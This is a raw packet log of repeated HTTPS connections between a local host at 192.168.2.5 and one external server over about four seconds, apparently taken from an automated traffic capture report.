Sep 1, 2024 22:05:41.526101112 CEST	50066	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.526114941 CEST	443	50066	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.538016081 CEST	443	50064	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.538088083 CEST	443	50064	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.538750887 CEST	443	50065	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.538819075 CEST	443	50065	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.538849115 CEST	50064	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.538868904 CEST	50065	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.553805113 CEST	50068	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.553807020 CEST	50064	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.553817987 CEST	443	50068	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.554361105 CEST	50069	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.554385900 CEST	443	50069	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.554415941 CEST	50068	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.554527044 CEST	50069	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.554613113 CEST	50068	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.554624081 CEST	443	50068	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.554723024 CEST	50069	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.554743052 CEST	443	50069	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.557178974 CEST	50065	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.660450935 CEST	443	50066	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.660692930 CEST	50066	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.660700083 CEST	443	50066	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.752259016 CEST	443	50067	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.754836082 CEST	50067	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.754853010 CEST	443	50067	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.797936916 CEST	443	50066	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.797992945 CEST	443	50066	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.798439980 CEST	50066	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.799659967 CEST	50070	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.799671888 CEST	443	50070	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.799910069 CEST	50070	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.799910069 CEST	50070	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.799926996 CEST	443	50070	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.878714085 CEST	443	50067	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.878952026 CEST	50067	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.878959894 CEST	443	50067	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.992002964 CEST	443	50068	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:41.999281883 CEST	50068	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:41.999294996 CEST	443	50068	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.007622004 CEST	443	50067	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.007689953 CEST	443	50067	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.007796049 CEST	50067	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.008603096 CEST	50071	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.008613110 CEST	50067	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.008614063 CEST	443	50071	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.008696079 CEST	50071	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.011276960 CEST	50071	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.011287928 CEST	443	50071	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.063402891 CEST	443	50069	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.064893007 CEST	50069	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.064914942 CEST	443	50069	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.127383947 CEST	443	50068	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.127661943 CEST	50068	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.127669096 CEST	443	50068	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.206196070 CEST	443	50069	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.209290028 CEST	50069	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.209296942 CEST	443	50069	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.242218018 CEST	443	50070	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.244163990 CEST	50070	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.244174957 CEST	443	50070	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.270185947 CEST	443	50068	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.270226955 CEST	443	50068	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.270322084 CEST	50068	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.270771980 CEST	50068	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.271519899 CEST	50072	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.271531105 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.271748066 CEST	50072	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.271887064 CEST	50072	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.271897078 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.353018999 CEST	443	50069	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.353090048 CEST	443	50069	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.353203058 CEST	50069	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.354934931 CEST	50069	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.354934931 CEST	50073	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.354949951 CEST	443	50073	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.355488062 CEST	50073	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.355488062 CEST	50073	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.355505943 CEST	443	50073	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.376405001 CEST	443	50070	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.376600027 CEST	50070	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.376605034 CEST	443	50070	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.451390028 CEST	443	50071	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.454508066 CEST	50071	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.454519987 CEST	443	50071	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.516697884 CEST	443	50070	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.516750097 CEST	443	50070	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.516880035 CEST	50070	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.517151117 CEST	50070	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.517924070 CEST	50074	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.517935038 CEST	443	50074	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.518162012 CEST	50074	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.518357038 CEST	50074	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.518367052 CEST	443	50074	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.587043047 CEST	443	50071	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.587162971 CEST	50071	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.587171078 CEST	443	50071	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.725692987 CEST	443	50071	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.725754023 CEST	443	50071	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.725802898 CEST	50071	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.726125956 CEST	50071	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.726866007 CEST	50075	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.726876020 CEST	443	50075	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.726938009 CEST	50075	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.727139950 CEST	50075	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.727149010 CEST	443	50075	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.814938068 CEST	443	50073	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.818794966 CEST	50073	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.818809032 CEST	443	50073	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.832324028 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.834640980 CEST	50072	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.834654093 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.942244053 CEST	443	50073	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.942368984 CEST	50073	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.942378044 CEST	443	50073	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.963982105 CEST	443	50074	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.965269089 CEST	50074	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.965277910 CEST	443	50074	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.974816084 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:42.974967957 CEST	50072	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:42.974976063 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.082616091 CEST	443	50074	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.082771063 CEST	50074	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.082777023 CEST	443	50074	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.084256887 CEST	443	50073	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.084331036 CEST	443	50073	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.084382057 CEST	50073	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.084695101 CEST	50073	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.085386038 CEST	50076	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.085398912 CEST	443	50076	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.085459948 CEST	50076	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.085695982 CEST	50076	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.085706949 CEST	443	50076	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.122231960 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.122270107 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.122556925 CEST	50072	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.122565031 CEST	443	50072	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.122582912 CEST	50072	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.122612953 CEST	50072	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.123095036 CEST	50077	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.123104095 CEST	443	50077	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.123255968 CEST	50077	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.136230946 CEST	50077	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.136240959 CEST	443	50077	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.187529087 CEST	443	50075	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.189062119 CEST	50075	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.189076900 CEST	443	50075	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.211005926 CEST	443	50074	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.211050987 CEST	443	50074	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.211114883 CEST	50074	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.211857080 CEST	50074	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.212515116 CEST	50078	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.212522984 CEST	443	50078	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.212677956 CEST	50078	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.212845087 CEST	50078	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.212856054 CEST	443	50078	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.318780899 CEST	443	50075	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.319063902 CEST	50075	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.319072008 CEST	443	50075	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.460376978 CEST	443	50075	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.460449934 CEST	443	50075	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.460702896 CEST	50075	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.460920095 CEST	50075	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.461680889 CEST	50079	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.461695910 CEST	443	50079	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.461879015 CEST	50079	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.462068081 CEST	50079	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.462076902 CEST	443	50079	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.536597013 CEST	443	50076	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.538098097 CEST	50076	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.538120031 CEST	443	50076	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.591322899 CEST	443	50077	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.592797995 CEST	50077	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.592809916 CEST	443	50077	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.659058094 CEST	443	50078	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.659167051 CEST	443	50076	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.659382105 CEST	50076	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.659398079 CEST	443	50076	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.660514116 CEST	50078	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.660526037 CEST	443	50078	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.722095013 CEST	443	50077	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.723548889 CEST	50077	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.723558903 CEST	443	50077	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.771512032 CEST	443	50076	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.771631002 CEST	443	50076	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.772057056 CEST	50076	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.772131920 CEST	50076	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.772945881 CEST	50080	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.772984982 CEST	443	50080	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.773085117 CEST	50080	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.773385048 CEST	50080	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.773397923 CEST	443	50080	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.795686960 CEST	443	50078	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.795917988 CEST	50078	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.795924902 CEST	443	50078	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.857187986 CEST	443	50077	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.857232094 CEST	443	50077	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.857544899 CEST	50077	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.857672930 CEST	50077	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.858409882 CEST	50081	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.858448029 CEST	443	50081	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.859405994 CEST	50081	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.868629932 CEST	50081	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.868643999 CEST	443	50081	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.928107023 CEST	443	50079	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.932816982 CEST	50079	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.932837009 CEST	443	50079	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.935085058 CEST	443	50078	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.935129881 CEST	443	50078	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.935245991 CEST	50078	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.936150074 CEST	50078	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.936155081 CEST	50082	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.936189890 CEST	443	50082	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:43.939538956 CEST	50082	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.939538956 CEST	50082	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:43.939577103 CEST	443	50082	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.071518898 CEST	443	50079	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.078128099 CEST	50079	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.078136921 CEST	443	50079	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.210567951 CEST	443	50080	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.212843895 CEST	50080	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.212869883 CEST	443	50080	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.224611998 CEST	443	50079	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.224678993 CEST	443	50079	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.224833012 CEST	50079	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.225192070 CEST	50079	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.226923943 CEST	50083	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.226948977 CEST	443	50083	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.227098942 CEST	50083	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.227293968 CEST	50083	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.227303982 CEST	443	50083	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.337964058 CEST	443	50081	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.343303919 CEST	50081	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.343333960 CEST	443	50081	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.344091892 CEST	443	50080	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.347459078 CEST	50080	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.347470999 CEST	443	50080	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.395256996 CEST	443	50082	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.397623062 CEST	50082	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.397640944 CEST	443	50082	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.460954905 CEST	443	50081	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.461282015 CEST	50081	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.461297035 CEST	443	50081	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.486326933 CEST	443	50080	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.486397028 CEST	443	50080	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.486484051 CEST	50080	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.487309933 CEST	50080	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.487859964 CEST	50084	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.487896919 CEST	443	50084	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.487976074 CEST	50084	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.488174915 CEST	50084	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.488182068 CEST	443	50084	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.521637917 CEST	443	50082	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.522099972 CEST	50082	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.522114992 CEST	443	50082	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.588721037 CEST	443	50081	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.588766098 CEST	443	50081	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.588836908 CEST	50081	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.589247942 CEST	50081	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.589900017 CEST	50085	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.589926004 CEST	443	50085	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.589988947 CEST	50085	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.590270042 CEST	50085	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.590281963 CEST	443	50085	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.650494099 CEST	443	50082	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.650542021 CEST	443	50082	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.650604963 CEST	50082	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.651051998 CEST	50082	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.651912928 CEST	50086	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.651932001 CEST	443	50086	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.651983976 CEST	50086	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.652254105 CEST	50086	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.652265072 CEST	443	50086	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.672871113 CEST	443	50083	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.674622059 CEST	50083	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.674635887 CEST	443	50083	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.802603006 CEST	443	50083	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.802792072 CEST	50083	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.802809954 CEST	443	50083	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.947434902 CEST	443	50083	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.947516918 CEST	443	50083	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.947657108 CEST	50083	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.947890997 CEST	50083	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.948801041 CEST	50087	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.948833942 CEST	443	50087	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.948977947 CEST	50087	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.949242115 CEST	50087	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.949249983 CEST	443	50087	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.958713055 CEST	443	50084	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:44.960133076 CEST	50084	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:44.960151911 CEST	443	50084	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.055932045 CEST	443	50085	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.057544947 CEST	50085	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.057565928 CEST	443	50085	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.087352037 CEST	443	50086	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.095730066 CEST	50086	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.095752001 CEST	443	50086	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.103692055 CEST	443	50084	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.103908062 CEST	50084	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.103928089 CEST	443	50084	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.195221901 CEST	443	50085	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.195401907 CEST	50085	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.195415020 CEST	443	50085	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.221853018 CEST	443	50086	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.222012997 CEST	50086	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.222021103 CEST	443	50086	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.255750895 CEST	443	50084	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.255831003 CEST	443	50084	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.255893946 CEST	50084	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.256383896 CEST	50084	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.257252932 CEST	50088	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.257276058 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.257339954 CEST	50088	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.257632971 CEST	50088	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.257642984 CEST	443	50088	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.351807117 CEST	443	50086	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.351865053 CEST	443	50086	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.352062941 CEST	50086	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.352605104 CEST	50086	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.353410959 CEST	443	50085	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.353466034 CEST	443	50085	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.353535891 CEST	50085	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.353575945 CEST	50089	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.353600025 CEST	443	50089	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.353676081 CEST	50089	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.353935957 CEST	50089	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.353945971 CEST	443	50089	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.354617119 CEST	50085	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.355298996 CEST	50090	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.355308056 CEST	443	50090	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.355374098 CEST	50090	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:45.394299984 CEST	443	50087	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:45.397680998 CEST	50087	443	192.168.2.5	198.185.159.177
